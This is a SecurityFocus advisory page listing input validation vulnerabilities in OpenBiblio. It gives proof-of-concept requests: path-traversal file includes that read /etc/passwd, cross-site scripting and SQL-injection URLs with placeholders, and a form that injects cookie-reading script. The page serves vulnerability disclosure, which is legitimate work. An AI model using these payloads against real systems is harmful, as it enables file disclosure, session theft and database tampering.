Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

OpenBiblio Multiple Input Validation Vulnerabilities

An attacker can exploit these issues via a browser. To exploit some of these issues, the attacker must entice an unsuspecting victim to follow a malicious URI.

The following proofs of concept are available:

Local file-include vulnerabilities:

http://www.example.com/openbiblio/shared/help.php?page=../../../../../../etc/passwd%00
http://www.example.com/openbiblio/shared/header.php?tab=../../../etc/passwd%00

Cross-site scripting vulnerabilities:

http://www.example.com/openbiblio/admin/staff_del_confirm.php?UID=1&LAST=[XSS]&FIRST=[XSS]
http://www.example.com/openbiblio/admin/theme_del_confirm.php?themeid=6&name=[XSS]

HTML-injection vulnerability:

<form action="http://www.example.com/openbiblio/admin/theme_preview.php" method="post">
<input type="text" name="themeName" size="40" value="<script>alert(
document.cookie);</script>"><br><br>
<input type="submit" value="doit">
</form>

SQL-injection vulnerability:

http://www.example.com/openbiblio/reports/report_criteria.php?reset=Y&rptid=balanceDueList&title=Balance+Due+Member+List&sql=%0A++++[SQL]%0A++







 

Privacy Statement
Copyright 2009, SecurityFocus